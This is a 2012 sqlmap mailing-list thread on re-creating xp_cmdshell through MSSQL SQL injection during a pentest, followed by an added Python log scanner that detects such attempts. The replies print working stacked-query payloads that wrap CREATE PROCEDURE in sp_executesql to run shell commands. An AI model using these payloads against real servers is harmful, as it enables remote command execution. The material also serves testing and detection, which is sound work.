Re: [sqlmap-users] re-create xp_cmdshell
From: Adi M. <adi...@ya...> - 2012-06-18 10:59:50
No problem. Thanks, that worked, executed without error, however I still can't execute code. I've added ; exec xp_cmdshell 'ping -n 30 www.yahoo.com';-- but nothing, no delay.

________________________________
From: Miroslav Stampar <mir...@gm...>
To: Adi Mutu <adi...@ya...>
Cc: "sql...@li..." <sql...@li...>
Sent: Monday, June 18, 2012 1:38 PM
Subject: Re: [sqlmap-users] re-create xp_cmdshell

My bad. I've thought that the problem is trivial :)

This is the right way to do it:

http://www.target.com/vuln.asp?id=1;DECLARE @abc nvarchar(999); SET @abc='CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'', @ID OUT EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 EXEC sp_OADestroy @ID'; EXEC master..sp_executesql @abc;--

(https://svn.sqlmap.org/sqlmap/trunk/sqlmap/lib/takeover/xp_cmdshell.py)

That way you are bypassing that "syntax" obstacle by using a stored procedure, master..sp_executesql, to do it for you.

Kind regards,
Miroslav Stampar

On Mon, Jun 18, 2012 at 11:24 AM, Miroslav Stampar <mir...@gm...> wrote:
> Hi Adi.
>
> This means that CREATE PROCEDURE has to be used right after the semi-colon (;) sign.
>
> So, if you have a SELECT SQLi case like:
> SELECT * FROM users WHERE id=$_GET['id']
>
> you would need to inject into it something like:
> http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE..
>
> As you are probably using "recreate steps" from https://www.owasp.org/index.php/Testing_for_SQL_Server, this would mean that you would need to inject:
> http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS%0aDECLARE @result int, @OLEResult int, @RunResult int%0a....
>
> Kind regards,
> Miroslav Stampar
>
> On Mon, Jun 18, 2012 at 10:59 AM, Adi Mutu <adi...@ya...> wrote:
>> Hello,
>>
>> I have a MSSQL 2000 SQL injection in a pentest, I try to recreate xp_cmdshell and I get this:
>>
>> 'CREATE PROCEDURE' must be the first statement in a query batch.
>>
>> Does anybody have any idea about this behaviour and whether something can be done about it?
>>
>> Thanks
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
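The bypass in Miroslav's reply works because the CREATE PROCEDURE text is carried inside a string variable and handed to master..sp_executesql, so the "first statement in a query batch" restriction never applies to it. From the defender's side, the signal in web access logs is a stacked query (text after a ';' in a parameter) that carries those procedure names, even when the body is split with %0a or double-encoded. The following Python is an added detection example, not code from the thread or from sqlmap; the access-log lines and the `scan_log`/`stacked_query_hits` helpers are constructed for this illustration.

```python
"""Flag stacked-query attempts to recreate xp_cmdshell in web access logs."""
import re
from urllib.parse import unquote_plus

# Procedure names that appear in the payloads discussed in the thread.
# Any of them after a statement terminator in a request parameter is an alert.
SUSPICIOUS = ("xp_cmdshell", "sp_oacreate", "sp_oamethod", "sp_executesql",
              "create procedure")


def normalize(query: str) -> str:
    """URL-decode twice (handles double encoding), lower-case and collapse
    whitespace, so the %0a newlines used to split the procedure body vanish."""
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded).lower().strip()


def stacked_query_hits(query: str) -> list:
    """Return the suspicious tokens found after the first ';' in the query.
    Only text following a statement terminator counts, which is what turns
    a numeric id parameter into a second batch in the SELECT SQLi case."""
    text = normalize(query)
    if ";" not in text:
        return []
    tail = text.split(";", 1)[1]
    return [tok for tok in SUSPICIOUS if tok in tail]


# Minimal parser for the request part of a combined-format access-log line.
LOG_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')


def scan_log(lines) -> list:
    """Return (path, hits) for each log line whose query string carries a
    stacked-query xp_cmdshell re-creation attempt."""
    results = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m or "?" not in m.group("path"):
            continue
        path, _, query = m.group("path").partition("?")
        hits = stacked_query_hits(query)
        if hits:
            results.append((path, hits))
    return results


# Constructed sample log lines (not from the thread); the third mirrors the
# sp_executesql-wrapped form, the second the direct CREATE PROCEDURE form.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jun/2012:10:59:50 +0000] "GET /vuln.asp?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [18/Jun/2012:11:24:01 +0000] "GET /vuln.asp?id=1;CREATE%20PROCEDURE%20xp_cmdshell(@cmd%20varchar(255))%20AS%0aDECLARE%20@result%20int HTTP/1.1" 500 128',
    '10.0.0.9 - - [18/Jun/2012:13:38:12 +0000] "GET /vuln.asp?id=1;DECLARE%20@abc%20nvarchar(999);SET%20@abc=%27CREATE%20PROCEDURE%20xp_cmdshell(@cmd%20varchar(255))%20AS%20EXEC%20sp_OACreate%20%27%27WScript.Shell%27%27,@ID%20OUT%27;EXEC%20master..sp_executesql%20@abc;-- HTTP/1.1" 200 512',
    '10.0.0.7 - - [18/Jun/2012:13:40:00 +0000] "GET /search.asp?q=xp_cmdshell%20docs HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for path, hits in scan_log(SAMPLE_LOG):
        print(path, hits)
```

The last sample line is deliberately benign: the token appears, but not after a statement terminator, so it is not reported.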